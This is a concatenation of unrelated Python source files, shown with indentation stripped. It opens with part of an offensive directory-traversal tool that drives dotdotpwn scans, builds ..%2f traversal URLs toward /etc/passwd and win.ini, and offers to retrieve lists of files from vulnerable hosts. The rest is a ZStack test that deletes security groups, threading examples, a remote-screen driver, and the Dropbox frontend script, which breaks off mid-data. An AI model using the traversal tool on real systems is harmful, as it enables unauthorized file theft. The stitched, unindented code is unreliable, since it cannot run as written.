for name in everythingElse:
if (os.path.isdir(item)):
break
if (name in item):
new = "./%s/%s" % (name,item)
move(item,new)
break
##1, grab port
##2, output file cannot have "/" in filename
##3, grab base url, http module doesn't like http://
##4, file has \n causing errors in query, strip those
def parseURL(url):
tmp = url.split(":")
if (len(tmp) == 3):
tmp2 = tmp[2]
port = tmp2.split("/")[0]
if (len(tmp) <= 2):
if ("https" == tmp[0]):
port = "443"
elif ("http" == tmp[0]):
port = "80"
elif ("ftp" == tmp[0]):
port = "21"
else:
port = "80" #fallback so 'port' is always defined
if (len(tmp) > 3): #this should never happen
port = "80"
try:
resultsOut = url.split("/")[2] + url.split("/")[3]
except:
raise
tmp4 = url.split(":")[1]
baseURL = tmp4[2:]
if ("\n" in url):
URL = url[:-1]
else:
URL = url
if ("http" in URL):
module = "http-url"
elif ("ftp" in URL):
module = "ftp"
#print "Port, resOut, baseURL, URL: %s %s %s %s %s" % (port, resultsOut, baseURL, URL, module)
return port, resultsOut, baseURL, URL, module
def setDotPwnOptions():
if (args.os == "unix"):
konfirmString = '"root:"'
konfirmFile = '/etc/passwd'
if (args.os == "windows"):
konfirmString = '"[fonts]"'
konfirmFile = '/windows/win.ini'
return konfirmString,konfirmFile
#will return values to build a string like base+page+pre+path+encodedsplit+userrequestfile+suffix
#let base = IP:Port/
#let vulnPage = page.ext[/|=]
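#Illustrative example with hypothetical values (not from a real scan):
#  vulnProto="http://", vulnBase="10.0.0.5:80/", vulnPage="index.php?file=",
#  vulnStringPrefix="..%2f..%2f..%2f", encodedSplit="%2f", vulnStringSuffix=""
#retrieve() doubles the prefix and rebuilds the request, e.g. for "etc/passwd":
#  http://10.0.0.5:80/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd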
def analyzeVuln(vulnar):
final = []
for vuln in vulnar:
vulnProto = ""
vulnURL = []
vulnBase = ""
vulnPage = ""
vulnStringPrefix = ""
vulnStringSuffix = ""
encodedSplit = ""
tmp = vuln[17:len(vuln)-14] #vuln is entire line from [*] testing url... to <- VULNERABLE
vulnURL.append(tmp)
if ("http://" in tmp):
vulnProto = "http://"
vulnBase = tmp.split("http://")[1]
if ("https://" in tmp):
vulnProto = "https://"
vulnBase = tmp.split("https://")[1]
if ("ftp://" in tmp):
vulnProto = "ftp://"
vulnBase = tmp.split("ftp://")[1]
vulnPagetmp = vulnBase.split("/",1)[1]
vulnBase = vulnBase.split("/",1)[0]
vulnBase = vulnBase + "/"
#print "DEBUG: vulnBase %s" % vulnBase
#print "DEBUG: vulnPagetmp: %s" % vulnPagetmp
if ("=" in vulnPagetmp): #vulnPage with param, ie 'index.php?arg='
vulnPage = vulnPagetmp.split("=",1)[0]
vulnPage = vulnPage + "="
vulnStringPrefixtmp = vulnPagetmp.split("=",1)[1]
else: #vulnPage with no param, ie index.php/
if ("passwd" in vulnPagetmp or "win.ini" in vulnPagetmp):
#the vulnPage may be equal to the vulnBase/webRoot, no specific page
vulnPage = ""
else:
vulnPage = vulnPagetmp.split("/",2)[0]
vulnPage = vulnPage + "/"
#print "DEBUG: vulnPagetmpsplit %s" % vulnPagetmp.split("/",2)
vulnStringPrefixtmp = vulnPagetmp.split("/",2)[len(vulnPagetmp.split("/",2))-1]
#print "DEBUG: vulnStringPrefixtmp: %s" %vulnStringPrefixtmp
if (args.os == 'unix'): #looking for passwd and issue, user specified file not available yet
vulnStringPrefix = vulnStringPrefixtmp.split("etc")[0]
encodedSplittmp = vulnStringPrefixtmp.split("etc")[1]
if ("passwd" in vulnStringPrefixtmp):
vulnStringSuffix = vulnStringPrefixtmp.split("passwd")[1]
for c in encodedSplittmp:
if (c == "p"):
break
else:
encodedSplit = encodedSplit + c
if ("issue" in vulnStringPrefixtmp):
vulnStringSuffix = vulnStringPrefixtmp.split("issue")[1]
for c in encodedSplittmp:
if (c == "p"):
break
else:
encodedSplit = encodedSplit + c
if (args.os == 'windows'):
print "VulnStringPrefixtmp: " + vulnStringPrefixtmp
vulnStringPrefix = vulnStringPrefixtmp.split("windows")[0]
encodedSplittmp = vulnStringPrefixtmp.split("windows")[1]
if ("win.ini" in vulnStringPrefixtmp):
vulnStringSuffix = vulnStringPrefixtmp.split("win.ini")[1]
for c in encodedSplittmp:
if (c == "w"):
break
else:
encodedSplit = encodedSplit + c
vals = vulnProto, vulnBase, vulnPage, vulnStringPrefix, vulnStringSuffix, encodedSplit
print "DEBUG: Make sure these values are correct: vulnProto, vulnBase, vulnPage, vulnStringPrefix, vulnStringSuffix, encodedSplit"
print vals
final.append(vals)
return final
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Rough script to handle discovery of, and exfiltration of data through, directory traversal vulnerabilities. Recommended invocation: dirTrav <URLs> <os> -sr')
parser.add_argument('-d', '--scan-depth', type=int, action="store", dest="depth", default=10, help="depth of ../../../ to extend to, default of 10")
parser.add_argument('-e', '--extensions', type=str, action="store", dest="extensions", default='".html"', help='extensions appended at the end of each fuzz string (e.g. \'".php", ".jpg", ".inc"\' Entire list needs to be encased in single quotes. Each extension needs to be in double quotes. There needs to be a comma and a space between each extension)')
parser.add_argument('file', type=str, help="file with URLs to fuzz")
parser.add_argument('os', type=str, action="store", help="OS greatly helps reduce false positives and reduces scan time. 'windows' or 'unix'")
parser.add_argument('-s', '--scan', action="store_true", dest="scan", default=True, help="scan the target for directory traversal")
parser.add_argument('-sr', '--scan-and-retrieve', nargs='?', const=True, default=False, dest="scan_and_retrieve", help="scan and retrieve files if a directory traversal is found") #booleans: the old string defaults were always truthy
parser.add_argument('-x', '--xfil-files', type=str, action="store", dest="xfil_files", default="/root/lists/Personal/DirTrav/linux_all.txt", help="list of files to retrieve if a directory traversal vulnerability is found. Default is linux_all.txt.")
args = parser.parse_args()
#print args
vuln = []
inputFileName = "%s" % args.file
if (args.os == "windows"):
if ("linux_all.txt" in args.xfil_files):
print "Error: Will not retrieve linux files from Windows. Set os to Linux or pass a file with Windows files to -x"
raise
if (args.os == "linux"):
if ("windows_all.txt" in args.xfil_files):
print "Error: Will not retrieve windows files from Linux. Set os to Windows or pass a file with Linux files to -x"
raise
if (args.scan):
try:
inputFile = open(inputFileName,'r')
jobs = []
print "INFO: Starting Dotdotpwn"
for URL in inputFile:
if ("\n" in URL):
URL = URL[:-1]
if (URL[0] != "#"):
#print "Processing %s" % URL
p = multiprocessing.Process(target=dotPwn, args=(URL,))
jobs.append(p)
p.start()
inputFile.close()
except:
raise
|
delete_sg.py
|
'''
Destroy all security groups (find from ZStack database).
@author: Youyk
'''
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.config_operations as con_ops
import zstackwoodpecker.operations.net_operations as net_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import apibinding.inventory as inventory
import threading
import os
import time
import sys
thread_threshold = os.environ.get('ZSTACK_THREAD_THRESHOLD')
if not thread_threshold:
thread_threshold = 1000
else:
thread_threshold = int(thread_threshold)
session_uuid = None
session_to = None
session_mc = None
def delete_sgs(sgs):
for sg in sgs:
thread = threading.Thread(target=net_ops.delete_security_group, args=(sg.uuid, session_uuid))
while threading.active_count() > thread_threshold:
time.sleep(0.05)
exc = sys.exc_info()
if exc[0]:
raise exc[0], exc[1], exc[2]
thread.start()
while threading.activeCount() > 1:
exc = sys.exc_info()
if exc[0]:
raise exc[0], exc[1], exc[2]
time.sleep(0.1)
def test():
global session_to
global session_mc
global session_uuid
session_uuid = acc_ops.login_as_admin() #log in first so the config changes below use a valid session
session_to = con_ops.change_global_config('identity', 'session.timeout', '720000', session_uuid)
session_mc = con_ops.change_global_config('identity', 'session.maxConcurrent', '10000', session_uuid)
num = res_ops.query_resource_count(res_ops.SECURITY_GROUP, [], session_uuid)
if num <= thread_threshold:
sgs = res_ops.query_resource(res_ops.SECURITY_GROUP, [], session_uuid)
delete_sgs(sgs)
else:
start = 0
limit = thread_threshold - 1
curr_num = start
sgs = []
while curr_num < num:
sgs_tmp = res_ops.query_resource_fields(res_ops.SECURITY_GROUP, \
[], session_uuid, ['uuid'], start, limit)
sgs.extend(sgs_tmp)
curr_num += limit
start += limit
delete_sgs(sgs)
#con_ops.change_global_config('identity', 'session.timeout', session_to)
#con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc)
con_ops.change_global_config('identity', 'session.timeout', session_to, session_uuid)
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc, session_uuid)
left_num = res_ops.query_resource_count(res_ops.SECURITY_GROUP, [], session_uuid)
acc_ops.logout(session_uuid)
if left_num == 0:
test_util.test_pass('Delete SG Success. Delete %d SGs.' % num)
else:
test_util.test_fail('Delete SG Fail. %d SGs are not deleted.' % left_num)
def error_cleanup():
if session_to:
con_ops.change_global_config('identity', 'session.timeout', session_to)
if session_mc:
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc)
if session_uuid:
acc_ops.logout(session_uuid)
|
Chap10_Example10.18.py
|
from threading import Thread
daemonchk = False
def disp():
if daemonchk:
print('Display function only if it is daemon thread')
else:
print("Non-daemon thread")
threadobj = Thread(target = disp)
print("Before setting thread as daemon: ", threadobj.isDaemon())
threadobj.setDaemon(True) #daemon status must be set before start(); setting it afterwards raises RuntimeError
if threadobj.isDaemon():
daemonchk = True
threadobj.start()
|
multi_threading_ref.py
|
import threading
import time
start = time.perf_counter()
def do_something():
print('\nSleeping for 1 second')
time.sleep(1)
print('\nDone sleeping')
t1 = threading.Thread(target=do_something)
t2 = threading.Thread(target=do_something)
t1.start()
t2.start()
t1.join()
t2.join()
finish = time.perf_counter()
print(f'\nFinished in {round(finish-start, 2)} seconds')
|
MemMappedRemoteScreen.py
|
import urllib
import BinLib
from PIL import Image
from threading import Thread
RAM = [16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32]
"""
RAM for screen
Memory mapped each cell is one row of pixels
"""
buffer = Image.new("L",(16,16))
def screen():
global buffer
while True:
for x in xrange(16):
#print RAM[x],ram.read(RAM[x])
line = ""
for y in xrange(16):
if buffer.getpixel((y,x)) == 255:
line = line + "1"
else:
line = line + "0"
try:
urllib.urlopen("http://192.168.1.74:8000/?line="+line+"&row="+str(x))
except:
pass
class MemMappedRemoteScreen:
def __init__(self):
self.url = "192.168.1.74:8000"
self.TickTime = 0
self.currentTick = 0
self.screenThread = Thread(target=screen)
self.screenThread.start()
def tick(self,ram,prom):
for x in xrange(0,16):
#print RAM[x],ram.read(RAM[x])
q = BinLib.toTwoComp(ram.read(RAM[x]))
for y in xrange(16):
buffer.putpixel((y,x),255*int(q[y]))
def CleanUp(self):
pass
|
dropbox.py
|
#!/usr/bin/python
#
# Copyright (c) Dropbox, Inc.
#
# dropbox
# Dropbox frontend script
# This file is part of nautilus-dropbox 1.6.2.
#
# nautilus-dropbox is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# nautilus-dropbox is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with nautilus-dropbox. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import with_statement
import errno
import locale
import optparse
import os
import platform
import shutil
import socket
import StringIO
import subprocess
import sys
import tarfile
import tempfile
import threading
import thread
import time
import traceback
import urllib2
try:
import gpgme
except ImportError:
gpgme = None
from contextlib import closing, contextmanager
from posixpath import curdir, sep, pardir, join, abspath, commonprefix
INFO = u"Dropbox is the easiest way to share and store your files online. Want to learn more? Head to"
LINK = u"https://www.dropbox.com/"
WARNING = u"In order to use Dropbox, you must download the proprietary daemon."
GPG_WARNING = u"Note: python-gpgme is not installed, we will not be able to verify binary signatures."
ERROR_CONNECTING = u"Trouble connecting to Dropbox servers. Maybe your internet connection is down, or you need to set your http_proxy environment variable."
ERROR_SIGNATURE = u"Downloaded binary does not match Dropbox signature, aborting install."
DOWNLOAD_LOCATION_FMT = "https://www.dropbox.com/download?plat=%s"
SIGNATURE_LOCATION_FMT = "https://www.dropbox.com/download?plat=%s&signature=1"
DOWNLOADING = u"Downloading Dropbox... %d%%"
UNPACKING = u"Unpacking Dropbox... %d%%"
PARENT_DIR = os.path.expanduser("~")
DROPBOXD_PATH = "%s/.dropbox-dist/dropboxd" % PARENT_DIR
DESKTOP_FILE = u"/usr/share/applications/dropbox.desktop"
enc = locale.getpreferredencoding()
# Available from https://linux.dropbox.com/fedora/rpm-public-key.asc
DROPBOX_PUBLIC_KEY = """
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: SKS 1.1.0
mQENBEt0ibEBCACv4hZRPqwtpU6z8+BB5YZU1a3yjEvg2W68+a6hEwxtCa2U++4dzQ+7EqaU
q5ybQnwtbDdpFpsOi9x31J+PCpufPUfIG694/0rlEpmzl2GWzY8NqfdBFGGm/SPSSwvKbeNc
FMRLu5neo7W9kwvfMbGjHmvUbzBUVpCVKD0OEEf1q/Ii0Qcekx9CMoLvWq7ZwNHEbNnij7ec
nvwNlE2MxNsOSJj+hwZGK+tM19kuYGSKw4b5mR8IyThlgiSLIfpSBh1n2KX+TDdk9GR+57TY
vlRu6nTPu98P05IlrrCP+KF0hYZYOaMvQs9Rmc09tc/eoQlN0kkaBWw9Rv/dvLVc0aUXABEB
AAG0MURyb3Bib3ggQXV0b21hdGljIFNpZ25pbmcgS2V5IDxsaW51eEBkcm9wYm94LmNvbT6J
ATYEEwECACAFAkt0ibECGwMGCwkIBwMCBBUCCAMEFgIDAQIeAQIXgAAKCRD8kYszUESRLi/z
B/wMscEa15rS+0mIpsORknD7kawKwyda+LHdtZc0hD/73QGFINR2P23UTol/R4nyAFEuYNsF
0C4IAD6y4pL49eZ72IktPrr4H27Q9eXhNZfJhD7BvQMBx75L0F5gSQwuC7GdYNlwSlCD0AAh
Qbi70VBwzeIgITBkMQcJIhLvllYo/AKD7Gv9huy4RLaIoSeofp+2Q0zUHNPl/7zymOqu+5Ox
e1ltuJT/kd/8hU+N5WNxJTSaOK0sF1/wWFM6rWd6XQUP03VyNosAevX5tBo++iD1WY2/lFVU
JkvAvge2WFk3c6tAwZT/tKxspFy4M/tNbDKeyvr685XKJw9ei6GcOGHD
=5rWG
-----END PGP PUBLIC KEY BLOCK-----
"""
# Futures
def methodcaller(name, *args, **kwargs):
def caller(obj):
return getattr(obj, name)(*args, **kwargs)
return caller
def relpath(path, start=curdir):
"""Return a relative version of a path"""
if not path:
raise ValueError("no path specified")
if type(start) is unicode:
start_list = unicode_abspath(start).split(sep)
else:
start_list = abspath(start).split(sep)
if type(path) is unicode:
path_list = unicode_abspath(path).split(sep)
else:
path_list = abspath(path).split(sep)
# Work out how much of the filepath is shared by start and path.
i = len(commonprefix([start_list, path_list]))
rel_list = [pardir] * (len(start_list)-i) + path_list[i:]
if not rel_list:
return curdir
return join(*rel_list)
# End Futures
def console_print(st=u"", f=sys.stdout, linebreak=True):
global enc
assert type(st) is unicode
f.write(st.encode(enc))
if linebreak: f.write(os.linesep)
def console_flush(f=sys.stdout):
f.flush()
def yes_no_question(question):
while True:
console_print(question, linebreak=False)
console_print(u" [y/n] ", linebreak=False)
console_flush()
text = raw_input()
if text.lower().startswith("y"):
return True
elif text.lower().startswith("n"):
return False
else:
console_print(u"Sorry, I didn't understand that. Please type yes or no.")
def plat():
if sys.platform.lower().startswith('linux'):
arch = platform.machine()
if (arch[0] == 'i' and
arch[1].isdigit() and
arch[2:4] == '86'):
plat = "x86"
elif arch == 'x86_64':
plat = arch
else:
FatalVisibleError("Platform not supported")
return "lnx.%s" % plat
else:
FatalVisibleError("Platform not supported")
def is_dropbox_running():
pidfile = os.path.expanduser("~/.dropbox/dropbox.pid")
try:
with open(pidfile, "r") as f:
pid = int(f.read())
with open("/proc/%d/cmdline" % pid, "r") as f:
cmdline = f.read().lower()
except:
cmdline = ""
return "dropbox" in cmdline
def unicode_abspath(path):
global enc
assert type(path) is unicode
# don't pass unicode to os.path.abspath directly; it joins with os.getcwd(), which is always a str
return os.path.abspath(path.encode(sys.getfilesystemencoding())).decode(sys.getfilesystemencoding())
@contextmanager
def gpgme_context(keys):
gpg_conf_contents = ''
_gpghome = tempfile.mkdtemp(prefix='tmp.gpghome')
try:
os.environ['GNUPGHOME'] = _gpghome
fp = open(os.path.join(_gpghome, 'gpg.conf'), 'wb')
fp.write(gpg_conf_contents)
fp.close()
ctx = gpgme.Context()
loaded = []
for key_file in keys:
result = ctx.import_(key_file)
key = ctx.get_key(result.imports[0][0])
loaded.append(key)
ctx.signers = loaded
yield ctx
finally:
del os.environ['GNUPGHOME']
shutil.rmtree(_gpghome, ignore_errors=True)
class SignatureVerifyError(Exception):
pass
def verify_signature(key_file, sig_file, plain_file):
with gpgme_context([key_file]) as ctx:
sigs = ctx.verify(sig_file, plain_file, None)
return sigs[0].status == None
def download_file_chunk(url, buf):
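# Generator: streams the download into `buf`, yielding (fraction_complete, True)
# after each chunk is written and (fraction_complete, False) when the socket would
# block (errno EAGAIN); the caller drives the transfer by iterating over it.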
opener = urllib2.build_opener()
opener.addheaders = [('User-Agent', "DropboxLinuxDownloader/1.6.2")]
sock = opener.open(url)
size = int(sock.info()['content-length'])
bufsize = max(size / 200, 4096)
progress = 0
with closing(sock) as f:
yield (0, True)
while True:
try:
chunk = f.read(bufsize)
progress += len(chunk)
buf.write(chunk)
yield (float(progress)/size, True)
if progress == size:
break
except OSError, e:
if hasattr(e, 'errno') and e.errno == errno.EAGAIN:
# nothing left to read
yield (float(progress)/size, False)
else:
raise
class DownloadState(object):
def __init__(self):
self.local_file = StringIO.StringIO()
def copy_data(self):
return download_file_chunk(DOWNLOAD_LOCATION_FMT % plat(), self.local_file)
def unpack(self):
# download signature
signature = StringIO.StringIO()
for _ in download_file_chunk(SIGNATURE_LOCATION_FMT % plat(), signature):
pass
signature.seek(0)
self.local_file.seek(0)
if gpgme:
if not verify_signature(StringIO.StringIO(DROPBOX_PUBLIC_KEY), signature, self.local_file):
raise SignatureVerifyError()
self.local_file.seek(0)
archive = tarfile.open(fileobj=self.local_file, mode='r:gz')
total_members = len(archive.getmembers())
for i, member in enumerate(archive.getmembers()):
archive.extract(member, PARENT_DIR)
yield member.name, i, total_members
archive.close()
def cancel(self):
if not self.local_file.closed:
self.local_file.close()
def load_serialized_images():
global box_logo_pixbuf, window_icon
import gtk
box_logo_pixbuf = gtk.gdk.pixbuf_new_from_data('\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x08\x00\\\x9ef\x00\\\x9ej\x00\\\x9e\x04\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\
x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9eZ\x00[\x9er\x00\\\x9e\x14\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e8\x00Y\x9c\xc2\x00X\x9b\xff\x00X\x9b\xff\x00[\x9d\xaa\x00\\\x9e\r\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x02\x00\\\x9e\x8e\x00Y\x9b\xff\x00Y\x9b\xff\x00Y\x9b\xd5\x00\\\x9eM\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x12\x00[\x9d\x8b\x00U\x99\xfa\x0fe\xa5\xff]\xa2\xd3\xffM\x95\xc9\xff\x00X\x9b\xff\x00Y\x9c\xc9\x00\\\x9e\x1e\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x0f\x00[\x9d\xb1\x00V\x99\xff4\x85\xc1\xffZ\xa3\xda\xff\x17m\xab\xff\x00V\x99\xff\x00Z\x9d\xa2\x00\\\x9e 
\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\\\x00W\x9a\xde\x00Y\x9c\xff:\x87\xbf\xff\x83\xbf\xeb\xff\x98\xce\xf6\xff\x9b\xd0\xf6\xffa\xa3\xd3\xff\x05]\x9e\xff\x00X\x9b\xda\x00\\\x9e/\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x1c\x00Z\x9c\xc5\x01Y\x9b\xff?\x90\xca\xff|\xc1\xf4\xff\x82\xc4\xf6\xff}\xbf\xf0\xffD\x90\xc8\xff\x05]\x9e\xff\x00V\x9a\xed\x00\\\x9es\x00\\\x9e\x07\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e4\x00Z\x9c\xba\x00V\x99\xff\x1dq\xae\xffd\xaa\xdd\xff\x8e\xc9\xf5\xff\x8e\xc7\xf3\xff\x8f\xc7\xf1\xff\x92\xc9\xf1\xff\xa1\xd2\xf6\xffw\xb3\xde\xff\x0fd\xa3\xff\x00V\x9a\xed\x00\\\x9eL\x00\